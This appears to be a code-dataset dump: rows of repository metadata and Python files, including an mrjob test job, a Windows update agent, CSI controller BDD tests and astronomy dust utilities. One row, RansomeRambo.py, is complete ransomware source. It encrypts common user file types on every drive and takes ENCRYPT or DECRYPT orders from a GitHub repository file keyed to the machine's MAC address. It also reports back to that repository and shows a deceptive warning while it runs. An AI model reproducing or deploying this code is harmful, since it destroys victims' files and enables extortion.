hexsha stringlengths 40 40 | size int64 7 1.04M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 247 | max_stars_repo_name stringlengths 4 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 368k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 247 | max_issues_repo_name stringlengths 4 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 247 | max_forks_repo_name stringlengths 4 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.04M | avg_line_length float64 1.77 618k | max_line_length int64 1 1.02M | alphanum_fraction float64 0 1 | original_content stringlengths 7 1.04M | filtered:remove_function_no_docstring int64 -102 942k | filtered:remove_class_no_docstring int64 -354 977k | filtered:remove_delete_markers int64 0 60.1k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
074a5f38b5f51641068bed34421d80734ffa302f | 1,275 | py | Python | tests/mr_verbose_job.py | mikiec84/mrjob | 801fffffdc6af860edd7813c948f9da341305b21 | [
"Apache-2.0"
] | 1,538 | 2015-01-02T10:22:17.000Z | 2022-03-29T16:42:33.000Z | tests/mr_verbose_job.py | mikiec84/mrjob | 801fffffdc6af860edd7813c948f9da341305b21 | [
"Apache-2.0"
] | 1,027 | 2015-01-09T21:30:37.000Z | 2022-02-26T18:21:42.000Z | tests/mr_verbose_job.py | mikiec84/mrjob | 801fffffdc6af860edd7813c948f9da341305b21 | [
"Apache-2.0"
] | 403 | 2015-01-06T15:49:44.000Z | 2022-03-29T16:42:34.000Z | # Copyright 2009-2012 Yelp and Contributors
# Copyright 2014 Ed Schofield
# Copyright 2015 Yelp
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""We use this to test jobs that emit a large amount of stderr."""
from __future__ import print_function
import sys
from mrjob.job import MRJob
if __name__ == '__main__':
MRVerboseJob.run()
| 30.357143 | 74 | 0.70902 | # Copyright 2009-2012 Yelp and Contributors
# Copyright 2014 Ed Schofield
# Copyright 2015 Yelp
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""We use this to test jobs that emit a large amount of stderr."""
from __future__ import print_function
import sys
from mrjob.job import MRJob
class MRVerboseJob(MRJob):
    """Job that floods stderr with counter/status output, then blows up.

    Used by the test suite to exercise handling of jobs that emit a large
    amount of stderr and to verify stacktrace extraction.
    """

    def mapper_final(self):
        """Emit lots of counter/status lines on stderr, then raise."""
        # Push enough counter updates to exceed the 65536-byte UNIX pipe
        # buffer.
        for _ in range(10000):
            self.increment_counter('Foo', 'Bar')

        # Interleave status updates with direct stderr writes.
        for step in range(100):
            self.set_status(str(step))
            print('Qux', file=sys.stderr)

        # Fail on purpose so stacktrace finding can be tested.
        raise Exception('BOOM')
if __name__ == '__main__':
MRVerboseJob.run()
| 384 | 5 | 50 |
10efc1718f9d54c6796e3b72ec3fa022df3faae4 | 3,602 | py | Python | winagent/winupdater.py | wh1te909/winagent | 14c1bf658b8eaafb160e5c0d4094b2cd580739f3 | [
"MIT"
] | 14 | 2019-10-22T22:56:51.000Z | 2022-02-22T23:43:43.000Z | winagent/winupdater.py | wh1te909/winagent | 14c1bf658b8eaafb160e5c0d4094b2cd580739f3 | [
"MIT"
] | 3 | 2020-08-13T18:36:02.000Z | 2020-09-30T06:25:04.000Z | winagent/winupdater.py | wh1te909/winagent | 14c1bf658b8eaafb160e5c0d4094b2cd580739f3 | [
"MIT"
] | 10 | 2020-04-01T01:56:14.000Z | 2021-04-27T09:23:51.000Z | import json
import subprocess
import requests
from agent import WindowsAgent
| 34.634615 | 106 | 0.429761 | import json
import subprocess
import requests
from agent import WindowsAgent
class WinUpdater(WindowsAgent):
    """Agent-side Windows Update worker.

    Installs Windows updates via a local salt-call (``win_wua``) and reports
    results back to the management server over HTTP.
    """

    def __init__(self, log_level, log_to):
        # Endpoint URLs are derived from the server address stored in the
        # agent DB (``self.astor`` comes from WindowsAgent).
        super().__init__(log_level, log_to)
        self.updater_url = f"{self.astor.server}/winupdate/winupdater/"
        self.results_url = f"{self.astor.server}/winupdate/results/"
        self.scan_url = f"{self.astor.server}/api/v1/triggerpatchscan/"
        self.check_payload = {"agent_id": self.astor.agentid}

    def install_update(self, kb):
        """Download and install a single update by KB id via salt.

        Returns salt's stdout as text, or None if the call failed or timed
        out (the error is only logged at debug level).
        """
        try:
            # 2-hour timeout: update installs can be very slow.
            r = subprocess.run(
                [
                    self.salt_call,
                    "win_wua.get",
                    f"{kb}",
                    "download=True",
                    "install=True",
                    "--local",
                ],
                capture_output=True,
                timeout=7200,
            )
            ret = r.stdout.decode("utf-8", errors="ignore")
            self.logger.debug(ret)
            return ret
        except Exception as e:
            # NOTE(review): swallowing the error returns None, which the
            # caller feeds to json.loads — relies on install_all's own
            # try/except to absorb that. Confirm intended.
            self.logger.debug(e)

    def trigger_patch_scan(self):
        """Ask the server to re-scan patches, reporting reboot-needed state.

        Returns "ok" on success, False if the request (or the local salt
        reboot check) raised.
        """
        try:
            payload = {
                "agent_id": self.astor.agentid,
                "reboot": self.salt_call_ret_bool("win_wua.get_needs_reboot"),
            }
            r = requests.patch(
                self.scan_url,
                data=json.dumps(payload),
                headers=self.headers,
                timeout=60,
                verify=self.verify,
            )
        except Exception as e:
            self.logger.debug(e)
            return False

        return "ok"

    def install_all(self):
        """Fetch pending patches from the server and install each one.

        Per-patch results ("success" / "failed" / "alreadyinstalled") are
        PATCHed back to the server; a patch re-scan is triggered at the end.
        Returns False when there is nothing to do or the initial fetch fails.
        """
        try:
            resp = requests.get(
                self.updater_url,
                data=json.dumps(self.check_payload),
                headers=self.headers,
                timeout=30,
                verify=self.verify,
            )
        except Exception as e:
            self.logger.debug(e)
            return False
        else:
            if resp.json() == "nopatches":
                return False
            else:
                try:
                    for patch in resp.json():
                        kb = patch["kb"]
                        install = self.install_update(kb)
                        self.logger.info(install)
                        res_payload = {"agent_id": self.astor.agentid, "kb": kb}
                        # Parse salt's JSON output to classify the outcome.
                        status = json.loads(install)
                        if (
                            status["local"]["Install"]["Updates"]
                            == "Nothing to install"
                        ):
                            res_payload.update({"results": "alreadyinstalled"})
                        else:
                            if status["local"]["Install"]["Success"]:
                                res_payload.update({"results": "success"})
                            else:
                                res_payload.update({"results": "failed"})
                        requests.patch(
                            self.results_url,
                            json.dumps(res_payload),
                            headers=self.headers,
                            timeout=30,
                            verify=self.verify,
                        )
                    # trigger a patch scan once all updates finish installing, and check if reboot needed
                    self.trigger_patch_scan()
                except Exception as e:
                    self.logger.debug(e)
| 3,366 | 10 | 139 |
ff3ce84693032b7db794d048169346347ad09d7e | 5,946 | py | Python | RansomeRambo.py | ashfaquekhan/RansomeRambo | bd91f6f6044a7c51730962416adaa83ff7176541 | [
"MIT"
] | null | null | null | RansomeRambo.py | ashfaquekhan/RansomeRambo | bd91f6f6044a7c51730962416adaa83ff7176541 | [
"MIT"
] | null | null | null | RansomeRambo.py | ashfaquekhan/RansomeRambo | bd91f6f6044a7c51730962416adaa83ff7176541 | [
"MIT"
] | 1 | 2021-03-19T07:06:57.000Z | 2021-03-19T07:06:57.000Z | import os
from cryptography import fernet
from cryptography.fernet import Fernet
from binascii import Error
import string
from ctypes import windll
from glob import glob
from github import Github
from uuid import getnode as get_mac
from os import path
import sys
k="_________________________YOUR_KEY_________________________"
global tDirs
global tFiles
print('''
____ ____ _ / \__
| _ \ __ _ _ __ ___ ___ _ __ ___ ___ | _ \ __ _ _ __ ___ | |__ ___ ( @\___
| |_) / _` | '_ \/ __|/ _ \| '_ ` _ \ / _ \ | |_) / _` | '_ ` _ \| '_ \ / _ \ / O
| _ < (_| | | | \__ \ (_) | | | | | | __/ | _ < (_| | | | | | | |_) | (_) | / (_____/
|_| \_\__,_|_| |_|___/\___/|_| |_| |_|\___| |_| \_\__,_|_| |_| |_|_.__/ \___/ /_____/ ''')
if __name__ == '__main__':
lis = get_drives()
try:
data=get_hub()
if data == " ":
git_up("NEW_ENTRY","NULL")
elif "ENCRYPT" in data:
for l in lis:
scan_e(l+":\\")
git_up("SUCCESSFULL","FULLY_E_N_CRYPTED")
elif "DECRYPT" in data:
for l in lis:
scan_d(l+":\\")
git_up("SUCCESSFULL","FULLY_D_E_CRYPTED")
except:
release_issue()
data=get_hub()
pass
| 38.36129 | 91 | 0.581399 | import os
from cryptography import fernet
from cryptography.fernet import Fernet
from binascii import Error
import string
from ctypes import windll
from glob import glob
from github import Github
from uuid import getnode as get_mac
from os import path
import sys
k="_________________________YOUR_KEY_________________________"
global tDirs
global tFiles
print('''
____ ____ _ / \__
| _ \ __ _ _ __ ___ ___ _ __ ___ ___ | _ \ __ _ _ __ ___ | |__ ___ ( @\___
| |_) / _` | '_ \/ __|/ _ \| '_ ` _ \ / _ \ | |_) / _` | '_ ` _ \| '_ \ / _ \ / O
| _ < (_| | | | \__ \ (_) | | | | | | __/ | _ < (_| | | | | | | |_) | (_) | / (_____/
|_| \_\__,_|_| |_|___/\___/|_| |_| |_|\___| |_| \_\__,_|_| |_| |_|_.__/ \___/ /_____/ ''')
def encrypt(filename, key):
f = Fernet(key)
with open(filename, "rb") as file:
file_data = file.read()
encrypted_data = f.encrypt(file_data)
with open(filename, "wb") as file:
file.write(encrypted_data)
def decrypt(filename, key):
f = Fernet(key)
with open(filename, "rb") as file:
encrypted_data = file.read()
decrypted_data = f.decrypt(encrypted_data)
with open(filename, "wb") as file:
file.write(decrypted_data)
def release_issue():
g = Github("________GITHUB-USERNAME________", "________GITHUB-AUTH-TOKEN________")
repo=g.get_user().get_repo("________REPOSITORY-NAME________")
mac = get_mac()
repo.create_file(str(mac)+".txt", "FILE_CREATED", "")
def fileInRepo(repo, path_to_file):
dir_path = os.path.dirname(path_to_file)
rsub = repo.head.commit.tree
path_elements = dir_path.split(os.path.sep)
for el_id, element in enumerate(path_elements):
sub_path = os.path.join(*path_elements[:el_id + 1])
if sub_path in rsub:
rsub = rsub[element]
else:
return False
return path_to_file in rsub
def git_up(msg,content):
g = Github("________GITHUB-USERNAME________", "________GITHUB-AUTH-TOKEN________")
repo=g.get_user().get_repo("________REPOSITORY-NAME________")
mac=get_mac()
file = repo.get_contents(str(mac)+".txt")
repo.update_file(str(mac)+".txt", msg, content, file.sha)
def get_hub():
github = Github("________GITHUB-USERNAME________", "________GITHUB-AUTH-TOKEN________")
user = github.get_user()
repository = user.get_repo("________REPOSITORY-NAME________")
mac= get_mac()
file_content = repository.get_contents(str(mac)+".txt")
chek = file_content.decoded_content.decode()
return chek
def get_drives():
drives = []
bitmask = windll.kernel32.GetLogicalDrives()
for letter in string.ascii_uppercase:
if bitmask & 1:
drives.append(letter)
bitmask >>= 1
return drives
def scan_d(APP_FOLDER):
tDirs=0
tFiles=0
lenl= os.listdir(APP_FOLDER)
lenl=len(lenl)
for base, dirs, files in os.walk(APP_FOLDER):
sys.stdout.write('\rDebugging Your PC [|U P D A T I N G ]')
sys.stdout.write('\rDebugging Your PC [ U|P D A T I N G ]')
sys.stdout.write('\rDebugging Your PC [ U P|D A T I N G ]')
sys.stdout.write('\rDebugging Your PC [ U P D|A T I N G ]')
sys.stdout.write('\rDebugging Your PC [ U P D A|T I N G ]')
sys.stdout.write('\rDebugging Your PC [ U P D A T|I N G ]')
sys.stdout.write('\rDebugging Your PC [ U P D A T I|N G ]')
sys.stdout.write('\rDebugging Your PC [ U P D A T I N|G ]')
sys.stdout.write('\rDebugging Your PC [ U P D A T I N G|]')
for directories in dirs:
tDirs += 1
for Files in files:
tFiles += 1
if Files.endswith(('.png','.jpg','.txt','.mp4','.jpeg','.pdf','.docx')):
try:
os.chdir(base)
decrypt(os.path.abspath(Files),k)
except(fernet.InvalidToken, TypeError, Error,PermissionError,OSError):
continue
sys.stdout.write('\r[ U P D A T E D ]')
def scan_e(APP_FOLDER):
tDirs=0
tFiles=0
for base, dirs, files in os.walk(APP_FOLDER):
sys.stdout.write('\rClosing The Window Might Harm Your PC [|U P D A T I N G ]')
sys.stdout.write('\rClosing The Window Might Harm Your PC [ U|P D A T I N G ]')
sys.stdout.write('\rClosing The Window Might Harm Your PC [ U P|D A T I N G ]')
sys.stdout.write('\rClosing The Window Might Harm Your PC [ U P D|A T I N G ]')
sys.stdout.write('\rClosing The Window Might Harm Your PC [ U P D A|T I N G ]')
sys.stdout.write('\rClosing The Window Might Harm Your PC [ U P D A T|I N G ]')
sys.stdout.write('\rClosing The Window Might Harm Your PC [ U P D A T I|N G ]')
sys.stdout.write('\rClosing The Window Might Harm Your PC [ U P D A T I N|G ]')
sys.stdout.write('\rClosing The Window Might Harm Your PC [ U P D A T I N G|]')
for directories in dirs:
tDirs+=1
for Files in files:
tFiles+=1
if Files.endswith(('.png','.jpg','.txt','.mp4','.jpeg','.pdf','.docx')):
try:
os.chdir(base)
encrypt(os.path.abspath(Files),k)
except(fernet.InvalidToken, TypeError, Error,PermissionError,OSError):
continue
sys.stdout.write('\r[ U P D A T E D ]')
if __name__ == '__main__':
lis = get_drives()
try:
data=get_hub()
if data == " ":
git_up("NEW_ENTRY","NULL")
elif "ENCRYPT" in data:
for l in lis:
scan_e(l+":\\")
git_up("SUCCESSFULL","FULLY_E_N_CRYPTED")
elif "DECRYPT" in data:
for l in lis:
scan_d(l+":\\")
git_up("SUCCESSFULL","FULLY_D_E_CRYPTED")
except:
release_issue()
data=get_hub()
pass
| 4,405 | 0 | 209 |
ce7b861febb5ee8d59fd437d679cae5012bc6f16 | 4,609 | py | Python | tests/bdd/features/csi/controller/test_identity.py | Abhinandan-Purkait/mayastor-control-plane | 73390a0e61dd93d1fb7c2735ebac579b7bb88434 | [
"Apache-2.0"
] | 2 | 2022-01-05T06:55:02.000Z | 2022-01-13T22:02:37.000Z | tests/bdd/features/csi/controller/test_identity.py | Abhinandan-Purkait/mayastor-control-plane | 73390a0e61dd93d1fb7c2735ebac579b7bb88434 | [
"Apache-2.0"
] | 67 | 2021-10-04T08:12:11.000Z | 2022-01-19T16:59:10.000Z | tests/bdd/features/csi/controller/test_identity.py | Abhinandan-Purkait/mayastor-control-plane | 73390a0e61dd93d1fb7c2735ebac579b7bb88434 | [
"Apache-2.0"
] | 5 | 2021-11-18T10:36:23.000Z | 2022-01-14T20:51:51.000Z | """CSI Controller Identity RPC tests."""
from pytest_bdd import (
given,
scenario,
then,
when,
)
import pytest
import docker
import subprocess
import csi_pb2 as pb
from common.csi import CsiHandle
from common.deployer import Deployer
from common.apiclient import ApiClient
@pytest.fixture(scope="module")
@scenario("identity.feature", "get plugin information")
def test_plugin_info(setup):
"""get plugin information"""
@scenario("identity.feature", "get plugin capabilities")
def test_plugin_capabilities(setup):
"""get plugin capabilities"""
@scenario(
"identity.feature",
"probe CSI controller when REST API endpoint is accessible",
)
def test_probe_rest_accessible(setup):
"""probe when REST is accessible"""
@scenario(
"identity.feature",
"probe CSI controller when REST API endpoint is not accessible",
)
def test_probe_rest_not_accessible(setup):
"""probe when REST is not accessible"""
@given("a running CSI controller plugin", target_fixture="csi_instance")
@given(
"a running CSI controller plugin with accessible REST API endpoint",
target_fixture="csi_plugin",
)
@pytest.fixture(scope="function")
@given(
"a running CSI controller plugin without REST API server running",
target_fixture="csi_plugin_partial",
)
@when(
"a GetPluginInfo request is sent to CSI controller", target_fixture="info_request"
)
@then("CSI controller should report its name and version")
@when(
"a GetPluginCapabilities request is sent to CSI controller",
target_fixture="caps_request",
)
@then("CSI controller should report its capabilities")
@when("a Probe request is sent to CSI controller", target_fixture="probe_available")
@when(
"a Probe request is sent to CSI controller which can not access REST API endpoint",
target_fixture="probe_not_available",
)
@then("CSI controller should report itself as being ready")
@then("CSI controller should report itself as being ready")
@then("CSI controller should report itself as being not ready")
| 27.76506 | 88 | 0.740291 | """CSI Controller Identity RPC tests."""
from pytest_bdd import (
given,
scenario,
then,
when,
)
import pytest
import docker
import subprocess
import csi_pb2 as pb
from common.csi import CsiHandle
from common.deployer import Deployer
from common.apiclient import ApiClient
@pytest.fixture(scope="module")
def setup():
Deployer.start(1, csi=True)
subprocess.run(["sudo", "chmod", "go+rw", "/var/tmp/csi.sock"], check=True)
yield
Deployer.stop()
@scenario("identity.feature", "get plugin information")
def test_plugin_info(setup):
"""get plugin information"""
@scenario("identity.feature", "get plugin capabilities")
def test_plugin_capabilities(setup):
"""get plugin capabilities"""
@scenario(
    "identity.feature",
    "probe CSI controller when REST API endpoint is accessible",
)
def test_probe_rest_accessible(setup):
    """Run the probe scenario with the REST API reachable."""
@scenario(
    "identity.feature",
    "probe CSI controller when REST API endpoint is not accessible",
)
def test_probe_rest_not_accessible(setup):
    """Run the probe scenario with the REST API stopped."""
def csi_rpc_handle():
    """Build a CSI handle connected to the plugin's UNIX domain socket."""
    socket_uri = "unix:///var/tmp/csi.sock"
    return CsiHandle(socket_uri)
@given("a running CSI controller plugin", target_fixture="csi_instance")
def a_csi_plugin():
return csi_rpc_handle()
@given(
    "a running CSI controller plugin with accessible REST API endpoint",
    target_fixture="csi_plugin",
)
def csi_plugin_and_rest_api():
    """Verify the REST API responds, then hand out a CSI plugin handle."""
    # Check REST API accessibility by listing pools (raises if unreachable).
    ApiClient.pools_api().get_pools()
    return csi_rpc_handle()
@pytest.fixture(scope="function")
def stop_start_rest():
docker_client = docker.from_env()
try:
rest_server = docker_client.containers.list(all=True, filters={"name": "rest"})[
0
]
except docker.errors.NotFound:
raise Exception("No REST server instance found")
rest_server.stop()
yield
rest_server.start()
@given(
    "a running CSI controller plugin without REST API server running",
    target_fixture="csi_plugin_partial",
)
def csi_plugin_without_rest_api(stop_start_rest):
    """Hand out a plugin handle after proving the REST API is down."""
    # Make sure REST API is not accessible anymore.
    with pytest.raises(Exception) as e:
        ApiClient.pools_api().get_pools()
    return csi_rpc_handle()
@when(
    "a GetPluginInfo request is sent to CSI controller", target_fixture="info_request"
)
def plugin_information_info_request(csi_instance):
    """Send GetPluginInfo; the response is exposed as `info_request`."""
    return csi_instance.identity.GetPluginInfo(pb.GetPluginInfoRequest())
@then("CSI controller should report its name and version")
def check_csi_controller_info(info_request):
assert info_request.name == "io.openebs.csi-mayastor"
assert info_request.vendor_version == "1.0.0"
@when(
    "a GetPluginCapabilities request is sent to CSI controller",
    target_fixture="caps_request",
)
def plugin_capabilities_request(csi_instance):
    """Send GetPluginCapabilities; the response is exposed as `caps_request`.

    Renamed from `plugin_information_info_request`, which redefined (and so
    shadowed) the GetPluginInfo step function of the same name earlier in
    this module. pytest-bdd matches steps by the decorator string, not the
    function name, so the rename is behavior-neutral.
    """
    return csi_instance.identity.GetPluginCapabilities(
        pb.GetPluginCapabilitiesRequest()
    )
@then("CSI controller should report its capabilities")
def check_csi_controller_info(caps_request):
all_capabilities = [
pb.PluginCapability.Service.Type.CONTROLLER_SERVICE,
pb.PluginCapability.Service.Type.VOLUME_ACCESSIBILITY_CONSTRAINTS,
]
assert len(caps_request.capabilities) == len(
all_capabilities
), "Wrong amount of plugin capabilities reported"
for c in caps_request.capabilities:
ct = c.service.type
assert ct in all_capabilities, "Unexpected capability reported: %s" % str(ct)
@when("a Probe request is sent to CSI controller", target_fixture="probe_available")
def probe_request_api_accessible(csi_plugin):
return csi_plugin.identity.Probe(pb.ProbeRequest())
@when(
    "a Probe request is sent to CSI controller which can not access REST API endpoint",
    target_fixture="probe_not_available",
)
def probe_request_api_not_accessible(csi_plugin_partial):
    """Probe the plugin while the REST API is stopped."""
    return csi_plugin_partial.identity.Probe(pb.ProbeRequest())
@then("CSI controller should report itself as being ready")
def check_probe_api_accessible(probe_available):
assert probe_available.ready.value, "CSI Plugin is not ready"
@then("CSI controller should report itself as being ready")
def check_probe_request_api_accessible(probe_available):
assert probe_available.ready.value, "CSI Plugin is not ready"
@then("CSI controller should report itself as being not ready")
def check_probe_request_api_not_accessible(probe_not_available):
assert (
probe_not_available.ready.value == False
), "CSI controller is ready when REST server is not reachable"
| 2,226 | 0 | 331 |
bf266ca003e5fba0c3b0b9fc1b7a8535de42864b | 13 | py | Python | openml_data_integration/protobuf_generator/openml_61/myconstants.py | tuix/tutorials | 733d35a8a39df079e8c2432c441b70785ab08440 | [
"Apache-2.0"
] | 8 | 2020-04-21T13:29:04.000Z | 2021-12-13T08:59:09.000Z | openml_data_integration/protobuf_generator/openml_61/myconstants.py | tuix/tutorials | 733d35a8a39df079e8c2432c441b70785ab08440 | [
"Apache-2.0"
] | 3 | 2021-04-27T11:03:04.000Z | 2021-05-24T18:22:57.000Z | openml_data_integration/protobuf_generator/openml_61/myconstants.py | tuix/tutorials | 733d35a8a39df079e8c2432c441b70785ab08440 | [
"Apache-2.0"
] | 6 | 2020-07-06T08:23:25.000Z | 2021-11-24T10:39:34.000Z | DATA_ID = 61
| 6.5 | 12 | 0.692308 | DATA_ID = 61
| 0 | 0 | 0 |
a57f096969ac9ee95489c6e8b7567700ba86d2eb | 102 | py | Python | models/control_agent.py | KevinJeon/The-Tragedy-of-the-commons | 7151faf25fd91732de19a843b39cd1f2614f34ca | [
"Apache-2.0"
] | 5 | 2021-03-21T15:04:36.000Z | 2021-06-22T14:09:00.000Z | models/control_agent.py | KevinJeon/The-Tragedy-of-the-commons | 7151faf25fd91732de19a843b39cd1f2614f34ca | [
"Apache-2.0"
] | 5 | 2021-04-10T08:16:16.000Z | 2021-09-12T09:28:42.000Z | models/control_agent.py | KevinJeon/The-Tragedy-of-the-commons | 7151faf25fd91732de19a843b39cd1f2614f34ca | [
"Apache-2.0"
] | 2 | 2021-04-26T22:33:19.000Z | 2021-06-08T18:13:49.000Z | import torch.nn as nn
import torch as tr
| 10.2 | 23 | 0.666667 | import torch.nn as nn
import torch as tr
class ControlTower:
    """Placeholder for a centralized control agent; no behavior implemented yet."""

    def __init__(self):
        # Nothing to initialize yet.
        pass
| 11 | -2 | 50 |
ae524e05388437d5528605d101b38fa984ea9adb | 3,321 | py | Python | snsim/dust_utils.py | bcarreres/snsim | 86ffc49f254cd89c74be9c3350c00982e3d216e2 | [
"BSD-3-Clause"
] | 5 | 2021-07-14T18:23:59.000Z | 2022-02-02T13:09:55.000Z | snsim/dust_utils.py | bcarreres/snsim | 86ffc49f254cd89c74be9c3350c00982e3d216e2 | [
"BSD-3-Clause"
] | 7 | 2021-02-25T15:19:59.000Z | 2021-11-24T08:24:55.000Z | snsim/dust_utils.py | bcarreres/snsim | 86ffc49f254cd89c74be9c3350c00982e3d216e2 | [
"BSD-3-Clause"
] | 1 | 2021-05-19T11:25:18.000Z | 2021-05-19T11:25:18.000Z | """This module contains dust features."""
import os
import sncosmo as snc
import sfdmap
from snsim import __snsim_dir_path__
import glob
import requests
import tarfile
def check_files_and_dowload():
"""Check if sdfmap files are here and download if not.
Returns
-------
None
No return, just download files.
"""
files_in_dust_data = glob.glob(__snsim_dir_path__ + '/dust_data/*.fits')
files_list = ['SFD_dust_4096_ngp.fits', 'SFD_dust_4096_sgp.fits',
'SFD_mask_4096_ngp.fits', 'SFD_mask_4096_sgp.fits']
filenames = []
for file in files_in_dust_data:
filenames.append(os.path.basename(file))
for file in files_list:
if file not in filenames:
print("Dowloading sfdmap files from https://github.com/kbarbary/sfddata/")
url = "https://github.com/kbarbary/sfddata/archive/master.tar.gz"
response = requests.get(url, stream=True)
file = tarfile.open(fileobj=response.raw, mode="r|gz")
file.extractall(path=__snsim_dir_path__ + '/dust_data')
new_file = glob.glob(__snsim_dir_path__ + '/dust_data/sfddata-master/*.fits')
for nfile in new_file:
os.replace(nfile, __snsim_dir_path__ + '/dust_data/' + os.path.basename(nfile))
other_files = glob.glob(__snsim_dir_path__ + '/dust_data/sfddata-master/*')
for ofile in other_files:
os.remove(ofile)
os.rmdir(__snsim_dir_path__ + '/dust_data/sfddata-master')
break
def init_mw_dust(model, mw_dust):
"""Set MW dut effect on sncosmo model.
Parameters
----------
model : sncosmo.Model
The sncosmo model which to add the mw dust.
mw_dust_mod : dic
The model of dust to apply.
Returns
-------
None
Directly modify the sncosmo model.
"""
f99_r_v = 3.1
if 'rv' in mw_dust:
f99_r_v = mw_dust['rv']
if mw_dust['model'].lower() == 'ccm89':
dust = snc.CCM89Dust()
elif mw_dust['model'].lower() == 'od94':
dust = snc.OD94Dust()
elif mw_dust['model'].lower() == 'f99':
dust = snc.F99Dust(r_v=f99_r_v)
else:
raise ValueError(f"{mw_dust['model']} model does not exist in sncosmo")
model.add_effect(dust, frame='obs', name='mw_')
def add_mw_to_fit(fit_model, mwebv, mod_name, rv=3.1):
"""Set mw model parameters of a sncsomo model.
Parameters
----------
fit_model : type
Description of parameter `fit_model`.
mwebv : float
E(B-V) color excess of the sn.
rv : float
R_v coeff of the MW.
Returns
-------
None
Directly modify the sncosmo model.
"""
if 'mw_' in fit_model.effect_names:
fit_model.set(mw_ebv=mwebv)
if mod_name .lower() not in ['f99']:
fit_model.set(mw_r_v=rv)
def compute_ebv(ra, dec):
"""Compute E(B-V) color excess.
Parameters
----------
ra : float or numpy.ndarray
Right Ascension.
dec : float or numpy.ndarray
Declinaison.
Returns
-------
float or numpy.ndarray
The color excess correponding to ra, dec coordinates.
"""
map = sfdmap.SFDMap(__snsim_dir_path__ + '/dust_data')
ebv = map.ebv(ra, dec, unit='radian')
return ebv
| 28.144068 | 95 | 0.613972 | """This module contains dust features."""
import os
import sncosmo as snc
import sfdmap
from snsim import __snsim_dir_path__
import glob
import requests
import tarfile
def check_files_and_dowload():
    """Check if sdfmap files are here and download if not.

    Note: the typo in the name ("dowload") is kept for backward
    compatibility with existing callers.

    Returns
    -------
    None
        No return, just download files.
    """
    files_in_dust_data = glob.glob(__snsim_dir_path__ + '/dust_data/*.fits')
    files_list = ['SFD_dust_4096_ngp.fits', 'SFD_dust_4096_sgp.fits',
                  'SFD_mask_4096_ngp.fits', 'SFD_mask_4096_sgp.fits']
    filenames = []
    for file in files_in_dust_data:
        filenames.append(os.path.basename(file))
    # If any required map is missing, fetch the whole sfddata archive once.
    for file in files_list:
        if file not in filenames:
            print("Dowloading sfdmap files from https://github.com/kbarbary/sfddata/")
            url = "https://github.com/kbarbary/sfddata/archive/master.tar.gz"
            response = requests.get(url, stream=True)
            # Stream-extract the tarball directly from the HTTP response.
            file = tarfile.open(fileobj=response.raw, mode="r|gz")
            file.extractall(path=__snsim_dir_path__ + '/dust_data')
            # Move the .fits files up from sfddata-master/ and remove the rest.
            new_file = glob.glob(__snsim_dir_path__ + '/dust_data/sfddata-master/*.fits')
            for nfile in new_file:
                os.replace(nfile, __snsim_dir_path__ + '/dust_data/' + os.path.basename(nfile))
            other_files = glob.glob(__snsim_dir_path__ + '/dust_data/sfddata-master/*')
            for ofile in other_files:
                os.remove(ofile)
            os.rmdir(__snsim_dir_path__ + '/dust_data/sfddata-master')
            break
def init_mw_dust(model, mw_dust):
    """Attach a Milky-Way dust effect to a sncosmo model.

    Parameters
    ----------
    model : sncosmo.Model
        The sncosmo model which to add the mw dust.
    mw_dust : dic
        The model of dust to apply.

    Returns
    -------
    None
        Directly modify the sncosmo model.

    Raises
    ------
    ValueError
        If the requested dust model is not one of 'ccm89', 'od94', 'f99'.
    """
    # F99 takes R_v at construction time; default to the canonical 3.1.
    f99_r_v = mw_dust['rv'] if 'rv' in mw_dust else 3.1
    dust_name = mw_dust['model'].lower()
    if dust_name == 'ccm89':
        dust = snc.CCM89Dust()
    elif dust_name == 'od94':
        dust = snc.OD94Dust()
    elif dust_name == 'f99':
        dust = snc.F99Dust(r_v=f99_r_v)
    else:
        raise ValueError(f"{mw_dust['model']} model does not exist in sncosmo")
    model.add_effect(dust, frame='obs', name='mw_')
def add_mw_to_fit(fit_model, mwebv, mod_name, rv=3.1):
    """Set the MW dust parameters on a sncosmo model used for fitting.

    Parameters
    ----------
    fit_model : sncosmo.Model
        Model whose 'mw_' effect parameters are updated, if present.
    mwebv : float
        E(B-V) color excess of the sn.
    mod_name : str
        Name of the MW dust model.
    rv : float
        R_v coeff of the MW.

    Returns
    -------
    None
        Directly modify the sncosmo model.
    """
    if 'mw_' not in fit_model.effect_names:
        return
    fit_model.set(mw_ebv=mwebv)
    # F99 fixes R_v at construction time, so it is not a free parameter.
    if mod_name.lower() not in ('f99',):
        fit_model.set(mw_r_v=rv)
def compute_ebv(ra, dec):
    """Compute E(B-V) color excess.

    Parameters
    ----------
    ra : float or numpy.ndarray
        Right Ascension.
    dec : float or numpy.ndarray
        Declinaison.

    Returns
    -------
    float or numpy.ndarray
        The color excess correponding to ra, dec coordinates.
    """
